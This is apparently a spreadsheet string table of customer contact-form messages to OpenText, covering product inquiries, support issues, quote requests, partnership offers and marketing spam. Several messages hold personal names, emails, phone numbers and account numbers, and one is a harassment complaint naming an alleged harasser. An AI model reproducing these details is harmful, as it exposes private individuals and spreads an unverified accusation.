    <t>Commercial informations on GUPTA SQLBase 11.6.2 Server (linux)</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
By way of introduction I’m currently managing the Myer Integration team responsible for all internal and external IT integration performed by Myer.  Myer is currently using the metastorm endi (4.3 – 4.4) product which I believe is now part of the GXS suite of products known as Managed File Transfer.  An internal project is underway to move one of our existing servers onto a RHEL 7.2 server running MQ 8.0.  I would like to inquire about which version of the product should be installed for that environment and if the product is backwardly compatible to the older versions that Myer has installed on other servers. _x000D_
</t>
  </si>
  <si>
    <t>We are changing our smtp server.  I attempted to change to the new server and had trouble.  I then attempted to change back to the old one and it is now not working.  Can you help me, please?</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
We are enquiring about the Email Grabber component of Invoice Management. We currently don't have this function activated. We would like to know if you have a demo of this functionality and also provide a rough idea on how much it might be to implement.</t>
  </si>
  <si>
    <t>User and PW. Reset but still can't log in. Please note the original email on the account is Ted@fairplaybrand.com.</t>
  </si>
  <si>
    <t xml:space="preserve">Requerimos precios y condiciones comerciales del producto. </t>
  </si>
  <si>
    <t>We are interested potentially transition our current fax services and lines to the cloud.</t>
  </si>
  <si>
    <t>We are currently reviewing Opentext technologies to replace our existing use of sharepoint as a rendering and publishing engine. We currently use Red dot (now part of opentext) for CMS, but I need to get a technical topology understanding of how the now varied opentext properties connect._x000D_
_x000D_
Thank you for your time.</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
I am writing to you on behalf of a local optometrist, Dr. Shanahan.  _x000D_
_x000D_
We are wondering if there would be interest in having Dr. Shanahan come in a do a lunch &amp; learn for your team.  She would concentrate on lens designs and coatings that are specifically designed for people who spend over 5 hours a day on a computer.  _x000D_
_x000D_
Please let us know if this would be of interest. _x000D_
_x000D_
Best,_x000D_
Kelly Hrycusko</t>
  </si>
  <si>
    <t xml:space="preserve">I received an OpenText order for an evaluation copy of eDocs 16.1. However, I am lacking access to the knowledge center in order to download this._x000D_
_x000D_
Thanks,_x000D_
Megan </t>
  </si>
  <si>
    <t>We are interested in transitioning our fax services over to the cloud.</t>
  </si>
  <si>
    <t xml:space="preserve">We currently have a site using an old version of First Class (I think its version 9.0).  They currently pay for a recurring subscription for First Class but are having issues connecting newer mobile devices to the server due to its age.  I was curious what steps we have to take to get their server to a more up to date version. </t>
  </si>
  <si>
    <t>I would like to try RighFax Business.  We have less than 10 fax machines and also use efax.  I'm looking to replace them with a fax server.</t>
  </si>
  <si>
    <t xml:space="preserve">Need to upgrade our Application Xtender from current version 6.52.045.  </t>
  </si>
  <si>
    <t>I would like to learn more about CopenText Composer Notes. The two PDFs merely wetted my appetite._x000D_
I have been working with Lotus Notes for over twenty-seven years. First as a computer consultant with Price Waterhouse and later as a Senior Notes/Domino Instructor working directly for Lotus Development. For the past seven years, I have been helping companies move their data out of Lotus Notes. _x000D_
JV</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Are you trying to generate Quality Leads from Telecom/Broadcast/Media industry?_x000D_
_x000D_
 If yes, please share with us your requirement in below format.I will get back to you with counts and few sample contacts for your review. _x000D_
 _x000D_
Target Industry:  _____________; Geography:  ______________; Job Title (Any):  _________________:_x000D_
_x000D_
Appreciate your time and look forward to hear from you._x000D_
Regards,_x000D_
Adam Nealson_x000D_
Inside Sales Executive_x000D_
adam.nealson@v3dataintel.com_x000D_
</t>
  </si>
  <si>
    <t>Trying to reach your Accounts Receivable department. Cordys, Inc filed a claim in the CCAA of Nortel Networks. We understand Cordys was purchased by Open Text and want to speak to someone at Open Text about the claim and mailing address. Thank  you.</t>
  </si>
  <si>
    <t xml:space="preserve">Need access to knowledge center as a Deloitte Partner </t>
  </si>
  <si>
    <t xml:space="preserve">Interested in Brava and any other tools that integrate with Documentum </t>
  </si>
  <si>
    <t xml:space="preserve">Interested in evaluating whether your software could be used for our small in-house legal department (6 members). We need software that can track our legal matters, contracts, IP matters, and legal billing, and can also serve as a document repository. It would be great if the software has Outlook, Microsoft 365, and Sharepoint integration. </t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for customer success stories around data archival, specifically as it relates to salesforce data. Do you have any experience around this? </t>
  </si>
  <si>
    <t xml:space="preserve">Looking into DAM offerings and would love to gain some visibility on what your specific offerings are.  </t>
  </si>
  <si>
    <t>I'm looking for a solution that integrates with AX or at least that can create cXML. We have orders that come into us from email and from fax that are hand entered into our ERP. Would like to automate.</t>
  </si>
  <si>
    <t xml:space="preserve">Trying to figure out how to sell our workflow.net product to a customer in my territory who is asking for it?  Can't find in SFDC, our quoting tool_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Interest to be a Business Partner in south of Mexico </t>
  </si>
  <si>
    <t>Error 519 in mapper, "Normal and denormalised tables must contain at least one foreign key."  I have 2 database tables defined as output.  I have tried to assign the foreign key and still get this message.  The documentation inside the mapper is a bit vague on this.</t>
  </si>
  <si>
    <t>What is the license price for RightFax to support Windows 2012R2 Server please? What would be the migration/upgrade service cost for Europe (Italy)?</t>
  </si>
  <si>
    <t>Problem with Faxpress.  Keeps resending some faxes over and over.  Usually long ones (&gt;7 pages).  This is a recently replaced Fax server via RMA.</t>
  </si>
  <si>
    <t>Business Partnership Agreement</t>
  </si>
  <si>
    <t>I need a quote for 4x power supplies, one each for this order. _x000D_
_x000D_
Order# SUS08435798_x000D_
Fax Gateway 2100 - SN: DT2627937_x000D_
Fax Gateway 2100 - SN: DT2627931_x000D_
Fax Gateway 2100 - SN: DT2627935_x000D_
Fax Gateway 2100 - SN: DT2627930</t>
  </si>
  <si>
    <t>Question: Can you access the OpenText content server database directly?  If it's Oracle or MSSQL based?</t>
  </si>
  <si>
    <t xml:space="preserve">Having RightFax problem. RightFax is on HP LaserJet 500. It has been working fine till 4 weeks ago. User can receive faxes but cannot send faxes. Getting error "Scan has failed. Please try again" and it does not send. Need assistance with fixed for this issue. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi I am the sales mgr. for Advantage Car Rental and was contacting you to see if your company would like to take advantage of our great corporate rates for your corporate travel needs. If you are interested please feel free to contact me for information on our corporate rate program. I have attached a corporate program sheet I would just need you to fill out and send back to me if you are interested in taking advantage of these great rates. Or feel free to use our 10% off discount below_x000D_
_x000D_
_x000D_
https://www.advantage.com/?rc=CD02C826E8_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Enterprise Faxing opportunity.  Approximately 8000 faxes per day, needs 120 channels FoIP SIP connectivity to Cisco Communication Manager 11.5.  </t>
  </si>
  <si>
    <t>Need a quote on service for 500 pages of faxing per month. _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Alexander Earnshaw</t>
  </si>
  <si>
    <t xml:space="preserve">I am planning an RFI for a Knowledge Management solution to include Recommind, now OpenText.  I will need to send over an NDA prior to sending out the RFI.  Who shall I use as a point of contact?_x000D_
 _x000D_
Kind regards,_x000D_
 _x000D_
Michelle_x000D_
</t>
  </si>
  <si>
    <t>Vaga de emprego</t>
  </si>
  <si>
    <t xml:space="preserve">Hello_x000D_
We at PRH are currently compiling a database of our contract docs with our suppliers, _x000D_
We do not currently have any agreement with yourself on file, can you please send a copy over as soon as possible,_x000D_
</t>
  </si>
  <si>
    <t>The Export-Import Bank of the United States is an Agency of the United States Federal Government.  Our Agency is by law exempt from US sales tax, meaning we are not permitted to pay it.  We own licenses for OpenText Exceed and every year have to go through your aggressively difficult tax exemption process (for which we have failed in the past to satisfy).  We are trying to renew maintenance on Exceed again this year, however, we are running into the same problem.  Our Contracts Office is pressuring us to find a replacement to Exceed, which we do not want to do; however, your policy on tax exemption is forcing us to do so.  Is there someone in your organization that can assist us with the resolution of this problem?  This is revenue to your Company and I can't believe you aren't interested._x000D_
_x000D_
Thanks for your consideration.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I am based in  OT Paris oiffces. I would like to know the hours (start and end) of the  of the “Virtual Classroom – Asia Pacific” of the OpenText Process Suite Training sessions. Specialy the following course. _x000D_
2-4912 Entity Modeling for Process Platform v16_x000D_
http://www.opentext.com/training/coursedetails.html?id=2260_x000D_
_x000D_
Thanks in advance_x000D_
_x000D_
Thierry B._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We have submitted over 50 times to have the email notifications changed via the your email notification link for missing 997 documents for our trading partners,      with zero results. _x000D_
As this is the only other avenue of communication to your support team, we hope that you will change ALL contact information_x000D_
from: VendorNet-Support@radial.com_x000D_
to: productionsupport@vendornet.com_x000D_
Please do not respond until this has been completed._x000D_
and   NO we are not interested in your products. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I Represent Primezerve India Private Limited (www.primezerve.com), Bangalore, INDIA who has global footprints in Master Data Management Solutions._x000D_
_x000D_
Services: Online/Offline/Onsite_x000D_
_x000D_
	Master Data Cleansing_x000D_
	Master Data Enrichment_x000D_
	Master Data Classification_x000D_
	Master Data Collection and Standardization_x000D_
	Master Data Duplicate Resolution_x000D_
	Master Data Conversion_x000D_
_x000D_
So please let us know if you are looking for similar services. At your request, we can share you our company profile._x000D_
_x000D_
Thanks-</t>
  </si>
  <si>
    <t>Now we are planning to start an data archiving project for one of our customer SAP Landscape mainly ERP._x000D_
_x000D_
As currently OpenText 10.5 is being used as document archiving solution. We are interested to know how OpenText can be used for business data archiving from SAP ERP System._x000D_
_x000D_
We have following questions:_x000D_
_x000D_
1.	What changes need to implemented? Will it be a separate implementation on OpenText from the existing application?_x000D_
2.	What will be the license requirement._x000D_
3.	 Also any sizing guide if you can provide._x000D_
4.	What archiving solution OpenText can propose for this project._x000D_
_x000D_
If you need any additional details, please let me know._x000D_
_x000D_
Thanks &amp; Regards_x000D_
Amit_x000D_
+91 9830519666</t>
  </si>
  <si>
    <t>Hello!_x000D_
We filled in your application form for partnership on March 1. Can I know the status of our application for a partnership? Thank you.</t>
  </si>
  <si>
    <t>What is the nearest place that i can train in OpenText? currently am in Zambia</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Mr. Mark Barrenechea,_x000D_
Moscow Entrepreneurs Association would like to invite you to the X-th Annual B2B Forum “Russia-Europe: Cooperation without Frontiers” of the Moscow Entrepreneurs Association would be held on 29-30 June 2017 in Moscow._x000D_
The nine B2B fora already organized brought together 1,314 Russian and 463 European companies which had 3,079 bilateral negotiations. In 2013 the Forum was selected by the European Commission to hold the first «Mission for Growth to the Russian Federation» leaded by Mr. Antonio Tajani, Vice-President, now President of the European Parliament._x000D_
Forum tentative agenda on 29 June would include three round-tables: «Doing business in Russia», «EU experience in helping SMEs to be dynamic, sustainable and innovative», «European SMEs in Russia», plenary session “Fostering Russia – European Union industrial cooperation”, likewise a buffet-dinner. On 30 June face-to-face bilateral meetings between Russian and European companies, likewise Russian potential investors and European investment promotion institutions will be organized. _x000D_
There is no participation fee, no deadline for registration, no limitation on with whom to meet (everybody meets with everybody) and no limitation on sector basis._x000D_
B2B meetings fixing is been done by participants themselves. They select their meeting counterparts among those who have registered for B2B meetings. The sooner companies register the longer information on them is available at the site for others and ultimately more meeting they might have. Meetings schedule appears at the site when companies start to fix their meeting with each other._x000D_
If there is a specific request from foreign companies to meet concrete Russian companies or Russian companies from a particular sector we take that into account when promoting event among Russian companies._x000D_
Upon individual requests additional payable services could be provided to the Forum participants:_x000D_
- Placing advertising material on the Forum’s site under </t>
  </si>
  <si>
    <t>Dear Colleagues,_x000D_
Moscow Entrepreneurs Association would like to invite you to the X-th Annual B2B Forum “Russia-Europe: Cooperation without Frontiers” of the Moscow Entrepreneurs Association would be held on 29-30 June 2017 in Moscow._x000D_
The nine B2B fora already organized brought together 1,314 Russian and 463 European companies which had 3,079 bilateral negotiations. In 2013 the Forum was selected by the European Commission to hold the first «Mission for Growth to the Russian Federation» leaded by Mr. Antonio Tajani, Vice-President, now President of the European Parliament._x000D_
Forum tentative agenda on 29 June would include three round-tables: «Doing business in Russia», «EU experience in helping SMEs to be dynamic, sustainable and innovative», «European SMEs in Russia», plenary session “Fostering Russia – European Union industrial cooperation”, likewise a buffet-dinner. On 30 June face-to-face bilateral meetings between Russian and European companies, likewise Russian potential investors and European investment promotion institutions will be organized. _x000D_
There is no participation fee, no deadline for registration, no limitation on with whom to meet (everybody meets with everybody) and no limitation on sector basis._x000D_
B2B meetings fixing is been done by participants themselves. They select their meeting counterparts among those who have registered for B2B meetings. The sooner companies register the longer information on them is available at the site for others and ultimately more meeting they might have. Meetings schedule appears at the site when companies start to fix their meeting with each other._x000D_
If there is a specific request from foreign companies to meet concrete Russian companies or Russian companies from a particular sector we take that into account when promoting event among Russian companies._x000D_
Upon individual requests additional payable services could be provided to the Forum participants:_x000D_
- Placing advertising material on the Forum’s site under “Participa</t>
  </si>
  <si>
    <t>Is there a specialized company in Benelux that could provide us with Actuate skills ? i.e. Experts and Seniors. Preferable a company that we could work in partnership with._x000D_
Many thanks in advance.</t>
  </si>
  <si>
    <t>Wir hätten gerne Informationen zu möglichen Schnittstellen, um Daten zu übertragen.</t>
  </si>
  <si>
    <t>We are interested in knowing more about Opentext Captiva and Advanced Recognition Softwares. A demo of the software from Opentext would be very helpful</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for media archiving solution. </t>
  </si>
  <si>
    <t>Our agency currently uses Captiva Capture which is one of the products of EMC.  We would like to know more about Captiva Web Client (replacement of eInput) and if you offer any other scanning solutions similar to our current one.  Thank you,  Linda</t>
  </si>
  <si>
    <t xml:space="preserve">I would like the hotfix associated with DM-39998.  </t>
  </si>
  <si>
    <t xml:space="preserve">BiQuery server 10.5 ADS not importing users correctly. No user can authenticate to BiQuery at this time.  I created a new ADS driver but that one isn't visible in UserGroupManager. A different one, along with the original one is visible. System is un-usable. _x000D_
</t>
  </si>
  <si>
    <t>requesting quote for Fax portal service</t>
  </si>
  <si>
    <t xml:space="preserve">Recommend another option for installing Teamsite(TS) software. _x000D_
_x000D_
Just install enough to provide an "iw-store\{customstore}" reader functions.  _x000D_
_x000D_
No GUI component.  No editing. No content management at all.   _x000D_
Only the basic drivers for the O/S file system, just enough to enable folder navigation down an old recovered iw-store. _x000D_
The minimal needed to support a read only efforts of old TS Edition data on a host dedicatyed to viewing archived data._x000D_
Example, view of Teamsite Branch folders, all post being deleted from off the active Teamsite managing host.   _x000D_
The bare amount of software needed to simply "activate" or "deactivate" a recovered iw-store for enabling file system search efforts around old deleted materials. _x000D_
Just enough function to enable an iwserver mount point on a host that  receiver an old backup, with no other support. _x000D_
_x000D_
Just enough to view back in time a recovered "iw-store\{customdatastore}  object._x000D_
We have data auto recovered from a company's enterprise backup systems.  _x000D_
We've several remote hosts focused on old data discovery and old web archive viewing services._x000D_
The old data is recovered from enterprise backup.   _x000D_
_x000D_
It would make a good selling point as well for larger enterprise looking to see back into TS branches that were deleted. _x000D_
_x000D_
You could map out the active teamsite and passive teamsite node in a simple diagram._x000D_
_x000D_
[active TS host, full TS install]  -&gt;  [company enterpise backup system] -&gt;   [archived data, TS viewing host, bare minimal TS install] _x000D_
_x000D_
You can then recommend the archive host be used for any data mining of old data that was branch deleted from active TS hosts, or use the TS archive viewer for building of any web archive presentations.  </t>
  </si>
  <si>
    <t>What we do? _x000D_
We are a National IT services company, located in the Greater Chicago area.  We provide software solutions &amp; staff-aug on a contract, full time basis. _x000D_
I’m calling to find out what the process is. _x000D_
Thanks,_x000D_
Akhila</t>
  </si>
  <si>
    <t>Looking to find a cloud based e-fax solution for our pharmacy.</t>
  </si>
  <si>
    <t>We currently use RightFax 10.6 Enterprise server with a Brooktrout TR1034 fax board. We are looking at migrating to FOIP and would like to discuss this with someone in sales and/or technical support.</t>
  </si>
  <si>
    <t>Seeking a DAM product for both SAP and IBM WCS related content.</t>
  </si>
  <si>
    <t>Do you offer evaluation licenses for OpenText website management?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope you are the appropriate person to discuss about the database of Software Industry._x000D_
_x000D_
Database includes complete contact details and verified email addresses of software users: Project Managers, Engineers, Engineering Technologists, Graphic Designers, Technology Vendors, Delegates, OEMs, Machine Builders, Distributers, Independent Manufacturers Representatives, Development Managers, Telesales Program Specialists and Professionals from the entire world of software sectors mentioned below:_x000D_
_x000D_
1.) Business Software:- Office Suites(accounting Software's), CRM, Outsourcing Relationship Management, Shopping cart Software, ERP, BPM, Groupware, etc._x000D_
2.) Industrial Automation Software_x000D_
3.) Computer-aided Design Software_x000D_
4.) Educational Software:- Interactive geometry software, Classroom management software, Driving test software, etc._x000D_
5.) Telecommunication Software_x000D_
6.) Simulation Software_x000D_
7.) Medical Software_x000D_
_x000D_
Kindly let me know your target criteria so that we can provide you exact counts, cost and few free samples._x000D_
_x000D_
Target Industry :_x000D_
Target Geography :_x000D_
Target Job Title :_x000D_
_x000D_
Best Regards,_x000D_
Alice Miller    _x000D_
Marketing Manager_x000D_
_x000D_
If you do not wish to receive further Emails Kindly reply with "Leave-Out".</t>
  </si>
  <si>
    <t>Accueil_x000D_
Asset Matters_x000D_
Asset Matters addresses four fields in which RFID tags can offer a solution:_x000D_
_x000D_
1. Asset Management_x000D_
Administrative matters can influence the value and efficiency of capital, especially in heavy industry, mining industry, and oil and gas production. Tags can offer a solution for the labor intensity of monitoring capital._x000D_
_x000D_
2. Supply Chain Management_x000D_
The cost and profitability in supply chain management largely depends on the efficiency and quality of transportation. The challenge is to move quantities quickly with the least amount of handling in the most efficient way possible. One of the latest tools to manage quantity distribution is radio frequency identification (RFID)._x000D_
_x000D_
3. Access Control_x000D_
With conventional systems of access control, such as bar code, magnetic stripe, and proximity readers, user must handle the badge and place it close to or make physical contact with the reader. RFID technology provides a hands-free access control solution with many advantages over traditional access control badges and systems._x000D_
_x000D_
4. Personnel Tracking_x000D_
Employee location tracking in potentially hazardous environments or situations is paramount to ensuring safety. Evacuation situations often call for the immediate accounting of personnel to ensure personal safety. RFID-technology enables the possibility to use a combination of readers and tags attached to wrist bands or clothes to track personnel in the corporation or in specific zones. _x000D_
_x000D_
RFID-technology enables the possibility to use a combination of readers and tags to conveniently trace capital or personnel. The reader receives signals from the tags so that it can locate objects and get insight to its status and availability. This information will be displayed and saved in a cloud based system. Asset Matters offers this RFID-technology, together with the cloud-based system, via a license based on a monthly user fee.</t>
  </si>
  <si>
    <t xml:space="preserve">I woudl like to attend to one of the "2-4912 Entity Modeling for Process Platform v16" training sessions that are scheduled in Europe in March or next May._x000D_
_x000D_
Would it be possible to attend one of those sessions virtually?_x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>I m looking for more info about SAP Hybris Digital Documents for a diamond customer</t>
  </si>
  <si>
    <t xml:space="preserve">Hi. I need assistance please. We implemented VIM but we are experiencing many issues with the 2 sections that untimately relate to the compatibility of VIM with SAP._x000D_
Our main supplier always invoices us in Dollars but our Company code currency is ZAR. VIM and SAP seem to clash from a tolerance perspective._x000D_
Secondly we use a fixed rate on our purchase orders and we are getting fixed rate collision errors. Please can you advise how these solutions are managed especially since these are SAP standard items. Why is VIM acting contrary to what SAP standard rules are._x000D_
</t>
  </si>
  <si>
    <t>I received this email, please could you provide me information as to whether EOH Mthombo or a Company of EOH Mthombo is a partner in South Africa?</t>
  </si>
  <si>
    <t>I need a quote for Email Tracking Solution for 18 staff members</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I was wondering if you would be interested in our database of Key IT decision makers? _x000D_
_x000D_
We can provide you list of various technology Users:- Hadoop, Drupal, SharePoint, SAP, Sage, MS Users, Oracle, ERP, CRM, Sage, Accounting Software, Citrix, Avaya, Cisco, DBAs and many more._x000D_
_x000D_
Business titles include: CTO, Chief Architect, VP / Director / SVP / Application Development, Solutions Architect, Data Center Managers, Information Technology Project Manager, Network Manager, Vice President, Technology, Director of Information Technology, SVP of Information Technology, Product Management, Engineering, BI, BI Analysts, BI Architects, Data Analysts, so on._x000D_
_x000D_
Please let us know if you have any specific target audience I will send over a sample free of cost for your perusal._x000D_
_x000D_
Regards, _x000D_
Kiyara James_x000D_
Business Development Manager_x000D_
www.primedataservices.com_x000D_
</t>
  </si>
  <si>
    <t>I would like to know if there is a Business Center (Capture) bootcamp or training available? I do see the ICC bootcamp, but I do not see it for BCC. As BCC will be the way forwards especially for the S4Hana implementations, I would like to know if this training is available or when it will be available? Many thanks in advance. Kind regards, Adrienne Kranenburg</t>
  </si>
  <si>
    <t xml:space="preserve">Request for demo - St. Tammany Parish Hospital - EU0152741_x000D_
_x000D_
Current customer looking for a demo of RightFax.  _x000D_
_x000D_
Would it be possible to request a demo for RightFax, as well as its various add-ons??  _x000D_
_x000D_
We have our server deployed, gateway is installed and we are in process of finalizing our Outlook connectivity but we want to see what it can do and possibly what we might be missing?  </t>
  </si>
  <si>
    <t>Please contact me about your invoice number A0219679. Our account number is A63SF842. I would like to have more information about this account before we pay the invoice. Please contact me as soon as possible. Thank you!</t>
  </si>
  <si>
    <t>TMNAS working in concert with Philadelphia Insurance Companies has used the xPression product for many years. OpenText acquired this DCM product from Dell ECM in January this year along with Documentum. Who is our Account Representative?_x000D_
_x000D_
TMNAS would like to understand your product strategy and roadmap for xPression going forward.</t>
  </si>
  <si>
    <t>Interested in what you have to offer</t>
  </si>
  <si>
    <t>Need advice and support on how to download v8.6.119 of ExStream</t>
  </si>
  <si>
    <t>Dear, I want to arrange an appointment regarding the possibilities for EDI communications. We want to interface with our customers MARS and Nutricia who are also customer of OpenText. How can we arrange an appointment? Kind Regards, Dennis Wennekers +316 133 440 43.</t>
  </si>
  <si>
    <t>I am a Vendor Invoice Management consultant, I recently started working for myBrand. I would like to know, how me and my colleagues can get access to OpenText support, many thanks in advance. Kind regards, Adrienne Kranenburg</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
We are undergoing a feasibility study on modernizing plenty of Oracle forms, say &gt;1000 forms to modern Java web application._x000D_
_x000D_
We have several things would like to know_x000D_
_x000D_
1.	A little details on how to decompose a Oracle form to MVC pattern: HTML, Controller, DAO, things like that. _x000D_
2.	Is OpenText™ Composer CipherSoft fully automated tool? Any exception case like some kinds of forms are usually not convertible?_x000D_
3.	Is there a tool to help testing the functionality of the converted Java application? _x000D_
4.	Any trial you offer?_x000D_
_x000D_
Thanks._x000D_
</t>
  </si>
  <si>
    <t>VIMI-15377 Correction Instruction</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
we are thinking about changing PDF reader to either FoxIT or Nitro, do you have a client for PDF that supports one of these or do you only support Adobe Reader?_x000D_
_x000D_
Thanks in advance._x000D_
_x000D_
_x000D_
Best Regards,_x000D_
Jesper Breum</t>
  </si>
  <si>
    <t>We are currently looking for a system that can manage document hard-copies location within the storage hall and the system will able to digitalize the hard-copies as well. Our key customers is currently looking a solution. Our customers main activity is managing paper document logistics for their respective customers._x000D_
_x000D_
The system is expected to be able to support multi-tenancy and support cloud-based model.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir, _x000D_
_x000D_
Hasibat is a large systems integrator based in Kuwait providing technology solutions to the government and enterprise customer. _x000D_
_x000D_
We are looking for a partner to provide a Government eCorrespondence System to the Kuwait government. _x000D_
_x000D_
Please reply back ASAP._x000D_
_x000D_
Thanks and Best Regards,_x000D_
Rajesh Gandhi | Marketing Manager| Hasibat Information Technologies Co.| www.hasibat.com_x000D_
</t>
  </si>
  <si>
    <t>I have some queries and need to figure out solution for those.</t>
  </si>
  <si>
    <t>Wanting to keep our two Gupta SQL Windows licences active and up-gradable._x000D_
We got one email from Mark Barrenchea in Nov 2015 and nothing since._x000D_
We would like to freshen up some legacy code and would like to use the latest version of SQL Windows._x000D_
My S/N are 10609324, 10801904_x000D_
_x000D_
Can you please assist with the best way to move forward and allow us to continue to use the SQL Windows licences.</t>
  </si>
  <si>
    <t>Interested in learning how tools can support client's analytic and dashboard/reporting needs</t>
  </si>
  <si>
    <t xml:space="preserve">I am writing this message to complain about an unfortunate incident that recently happened to me at the office. I believe I have been sexually harassed by an employee in upper management. This employee’s name is Adel Ahmed._x000D_
_x000D_
I was asked to stay late to help Adel organise his office. Lately, I had been a bit wary of him because of some inappropriate jokes I overheard him telling to other male employees, but I still stayed to assist. _x000D_
_x000D_
When I began working, he came up behind me, put his hands on my waist, and said, “I’m glad we’re finally alone.” I quickly turned around in shock and embarrassment. He told me that he would take me out for dinner and drinks after this. I told him I was married. He said I could take off my wedding ring. I didn’t know what else to do, so I rushed out of the office, as I heard him yelling after me, “If you say anything about this, it’s over! You’ll be done!”_x000D_
_x000D_
I can’t even tell you how scared I have been to even write this letter. After a week of thinking about it and discussing it with my husband and friends, I was finally convinced that I needed to say something. _x000D_
_x000D_
I can’t stand the thought of working under this man. I can’t even make eye contact with him, I’m so disgusted._x000D_
_x000D_
Thank you for taking the time to address this issue._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in speaking with a representative at OpenText regarding ECM and BPM capabilities for a client we are working with based in Wichita, KS.  _x000D_
_x000D_
We are currently reviewing high-level requirements from our client regarding ECM capabilities and would like to speak with a sales rep  or technical sales rep regarding OpenText. </t>
  </si>
  <si>
    <t>Austin Community College District is seeking the correct contact person for RFI and RFP responses.  We currently have the following Enterprise Content Management System RFI, that will result in a RFP.  Please contact me via email or phone with the proper email and phone for the individual who would be interested.  Thank you in advance,_x000D_
_x000D_
_x000D_
AUSTIN COMMUNITY COLLEGE DISTRICT is soliciting information from qualified firms on Enterprise Content Management System (ECM) products available in the market, as summarized in the announcement RFI 208-17018SD Enterprise Content Management System (ECM) and fully described in the Solicitation Documents._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 The purpose of this Request for Information (RFI) is to gather information for a future solicitation and award. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
  Request for Information packages are available for download from the ACC Purchasing website at http://www.austincc.edu/solicitations_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
         Request for Information (RFIs) must be submitted no later than:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thursday, March 30, 2017, 2 p.m. Central Time_x000D_
_x000D_
to the ACC Purchasing Department, 9101 Tuscany Way, Austin, TX 78754._x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
All responses must be submitted and delivered by the date and time above.  Electronically transmitted responses will not be accepted as stated in the RFI documents, Part 1 - Response Requirements - Section 2.0 Required Format and Content of the Response. Hard copy proposals submitted must be sealed and returned to the ACC Purchasing Office, ACC Service Center, 9101 Tuscany Way, Austin, Texas 78754, by the date and time indicated above. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
The ACC Board of Trustees reserves the right to reject any and/or all responses and waive all formalities in the solicitation process._x000D_
_x000D_
  _x000D_
_x000D_
ACC is providing this notification to applicable firms in an effort to increase participation in the RFI process. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
The ACC single point of contact for the solicitation is:  Shaydi DeJesus, Senior Buyer, telephone (512) 223-1059; fax (512) 223-1902</t>
  </si>
  <si>
    <t>Need link to latest version of Open Text Imaging Viewer</t>
  </si>
  <si>
    <t>We are looking to re-platform Web.com as part of a redesign/re-invention of our primary corporate website. We are looking for ECM capabilities. I'd be interested in hearing from you to see if there's a good fit.</t>
  </si>
  <si>
    <t xml:space="preserve">Quote request for maintenance and support for our existing RightFax environment. </t>
  </si>
  <si>
    <t xml:space="preserve">Request for Quote for _x000D_
Supplier	Product	ID	Machine Size:  440 MSU; 3554 MIPS					_x000D_
			Proposed Price		Commercial Rate		GSA Rate	_x000D_
			MSU	MIPS	MSU	MIPS	MSU	MIPS_x000D_
Open Text	OEM SW License	Data Integrator						_x000D_
Open Text	OEM SW License	MIM 						_x000D_
Open Text	OEM SW License	MIM 						_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon – I hope this e-mail finds you well._x000D_
_x000D_
Several weeks ago I e-mailed a former marketing employee of yours (Lisa Snow) regarding possible sponsorship and exhibiting opportunities at the 2017 NAGARA Annual Conference. I wanted to see if Documentum would be interested in learning more about this year’s conference and the sponsorship/exhibiting opportunities that still exist.There are still a handful of opportunities available, and we hope you’ll join us in Boise!_x000D_
_x000D_
We’re excited for this year’s conference and anticipate registration to be one of the highest in the history of the conference – this is in part to NAGARA’s rapidly-growing membership and our new conference partnership agreements with ACA, CoSA, ICRM, and IIMC._x000D_
_x000D_
Please let me know if you have any questions about these opportunities, or if you are not interested at this time. I’m happy to arrange a phone call as well, if you’d like to learn more._x000D_
_x000D_
Look forward to hearing from you soon._x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Johnny Hadlock_x000D_
Program Manager, NAGARA_x000D_
info@nagara.org | 202.508.3800_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
From what I can tell, you are doing a lot of great marketing, but around 98 per cent of leads to your website are leaving without taking any action on your site. I can show you how, through reverse IP lookup, we can identify the companies and individuals visiting your site. I can also provide you with the contact info - including names, emails and phone numbers - of these visitors, effectively doubling or tripling the number of leads that can be harvested from your existing web traffic._x000D_
 _x000D_
My team has over twelve years of experience driving results for our clients, and we want you to be a part of their long reputation for success. We're based in Los Angeles, we're Google partners, and we've received accolades from Inc Magazine and the LA Business Journal. _x000D_
 _x000D_
Is there a time this week that works best to set up a call?_x000D_
_x000D_
Best,_x000D_
_x000D_
Velma Craig_x000D_
Digital Marketing Manager_x000D_
(877)-228-1545 _x000D_
Smarter Tactics_x000D_
Digital Marketing | AdWords Management | Content &amp; Social | Influencer Marketing</t>
  </si>
  <si>
    <t>Company is looking into options for content or document management options</t>
  </si>
  <si>
    <t>Dear OpenText team,_x000D_
_x000D_
I'm Mohamed Ben Rhaiem ,IT engineer in Murah Technologies company(SP BRAZIL),_x000D_
_x000D_
